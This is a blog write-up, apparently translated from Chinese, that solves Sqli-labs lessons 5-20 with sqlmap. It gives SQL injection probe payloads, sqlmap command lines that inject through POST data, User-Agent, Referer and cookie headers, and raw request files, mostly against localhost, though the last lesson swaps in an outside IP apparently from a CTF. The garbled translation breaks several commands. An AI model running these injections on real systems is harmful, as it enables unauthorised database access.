For Sqli-labs Foundation of the whole use SQLMAP without manual injection (Tanabata gift!!! ）

Personal Profile:
A new one, slag slag, a full stroke, will shout 66

This article has been written off and on for three days, and I've checked many other people's blogs

But it is found that most people use manual injection for sql-labs.

Because of their own too slag, only to find tools to inject (QAQ)

I hope you guys don't take offense!!

Whether you like it or not, you can leave a message!!!

About Sqli-labs's problem solving skills, using Sqlmap injection, try to use less hand-injected methods

About 1-4 in Sql-labs I've written a specific process in another article:

Https://www.cnblogs.com/lxz-1263030049/p/9363151.html

Sqli-labs:5-9 need to determine the injection method

The specific way of judging is as follows:

1: Blind for verification of time delay type:

? id=1 ' and Sleep (5)--+

2: Used to judge the Boolean blind Note:

? id=1 ' and 1=1--+,? id=1 ' and 2=1--

+

Then judging by the different echoes:

The main statements used:

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-8/?id=1--technique B--dbms mysql--batch-v 0

Or:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1"--technique B--dbs--batch

The -technique is an injection technique in sqlmap, which supports injection of different patterns in 5 in Sqlmap

b:boolean-based-Blind  (bool type injection) e:error-based   (Error injection) u:union query-based  (joint injection) s:starked Queries   (read file system via SQLMAP, operating system, registry must use this parameter, multi-statement query injection) t:time-based blind  (based on time delay injection)  

We can change the letters behind the -technique according to different error prompts.

-dbms: Not only can you specify a database type, you can also specify the database version-batch: This parameter, which does not require user input, will continue to run with the default value of the SQLMAP hint. The-v 0 parameter is just for the better.

Question eighth:

Use the statement as: Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1"--technique B--dbs–batch

Or use a statement:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1"--current-db--threads--batch--technique BES

You can get information about the database.

Question Nineth

The topic of deferred injection (as specified above) can also be used with similar statements:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-9/?id=1"--technique T--dbs--batch-v 0

About 第11-17:

Is the issue of post injection, but the internal mixed with the blind problem, the need to use burp Firefox browser hackbar are available ·

Question 11th: Post injection, based on error-character type

The Sqlmap can be run based on the value of the post echo.

：

The statements used are:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1"--data "uname=11111 &passwd=111111 & Submit=submit "--dbs--threads--batch--technique ES

of which:

--data: The following can be added to the data segment (post/get type is all possible)--threads: Maximum concurrent threads, blind when each thread gets a character (7 this request), gets completed after the thread ends, default is 1, it is recommended not to exceed 10, otherwise it may affect site availability 

The following just needs to be done by normal operation.

Question 12th:

A similar process is possible:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1"--data "Uname=") or ("1") = ("1 &passwd=") or (" 1 ") = (" 1 &submit=submit "--dbs--threads--batch--technique E

Or use a statement:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1"--data "Uname=") or ("1") = ("1&passwd=") or (" 1 ") = (" 1&submit=submi "--dbs--threads--batch--technique BES

Question 13th: You can use statements:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1"--data "Uname= ') or (' 1 ') = (' 1 &passwd= ') or (' 1 ') = (' 1&submit=submit '--dbs--threads--batch--technique EBS

It is also possible to get an answer (several other similar techniques)

Question 15th: The Blind of Boolean and time delay,

The simple injection statement is:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1"--data "uname= ' or ' 1 ' = ' 1&passwd= ' or ' 1 ' = ' 1 &submit=submit "--dbs--threads--batch--technique BET

Here is Sqli-labs 18-20,

These three topics are primarily about HTTP content

The common HTTP injection point generation location is

"Referer", "X-forwarded-for", "Cookie", "X-real-ip", "Accept-language", "Authorization"

Question 18th: Error type, single quote, user-agent injection point

As a result of this problem, the direct use of the User-agent statement is:

Python sqlmap.py-r 1.txt--dbs--threads--batch--technique btes

About TXT content:

post/sqli-labs-master/less-18/http/1.1host:127.0.0.1user-agent:mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) gecko/20100101 firefox/61.0*accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2accept-encoding:gzip, deflatereferer:http://127.0.0.1/sqli-labs-master/less-18/content-type:application/ X-www-form-urlencodedcontent-length:38connection:closeupgrade-insecure-requests:1uname=admin&passwd=admin &submit=submit

is what belongs to Burp.

-r:sqlmap can get HTTP requests from a text file, so you can skip setting some other parameters (such as cookie,post data, etc.)

Or you can do this:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-18/"--user-agent= "mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) gecko/20100101 firefox/61.0* '--level 4--dbs--threads--technique Best–batch

--user-agent HTTP header will carry a value, that is, the user-agent, the information that represents the browser to access Sqlmap check theinjection point in the uesr-agent,  lever>=3 will go to check user- 

Question 19th: error type, single quote, Referer injection point

The practice of this topic can be used as in the previous question:

Python sqlmap.py-r 1.txt--dbs--threads--batch--technique Best

Just the document saved as 1.txt becomes this:

post/sqli-labs-master/less-19/http/1.1host:127.0.0.1user-agent:mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) gecko/20100101 firefox/61.0accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q= 0.8accept-language:zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2accept-encoding:gzip, deflatereferer:http://127.0.0.1/sqli-labs-master/less-19/*content-type:application/ X-www-form-urlencodedcontent-length:38connection:closeupgrade-insecure-requests:1 Uname=admin&passwd=admin &submit=submit

Alternatively, you can use this statement to run out of the database:

Python sqlmap.py-u "http://127.0.0.1/sqli-labs-master/Less-19/"--referer= "http://127.0.0.1/sqli-labs-master/ less-19/* "--level 4--dbs--threads--technique Best–batch

As for some of the contents, there are already some introductions.

Here's the last question.

Question 20th: Error type, single quote, cookie type injection

For the last question, I'll end it with one of the most recently seen questions.

Title Link: http://202.112.51.184:16080/

Take a look directly at the bag:

There is a problem with the cookie, use Sqlmap directly to inject '

Python sqlmap.py-u "http://202.112.51.184:16080/"--cookie= "phpsessid=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

--Cookieweb apply cookie-based authentication, for post requests, you can specify Cookiesqlmap-u "url"--cookie= "..."--level 3  

Reference article:

Sql-labs less:https://www.cnblogs.com/peterpan0707007/p/7620048.html

Sqlmap Injection Summary: http://blog.51cto.com/wt7315/1841241

Sqli-lab's combat record (less 11-less 20): 51920968

For Sqli-labs Foundation of the whole use SQLMAP without manual injection (Tanabata gift!!! ）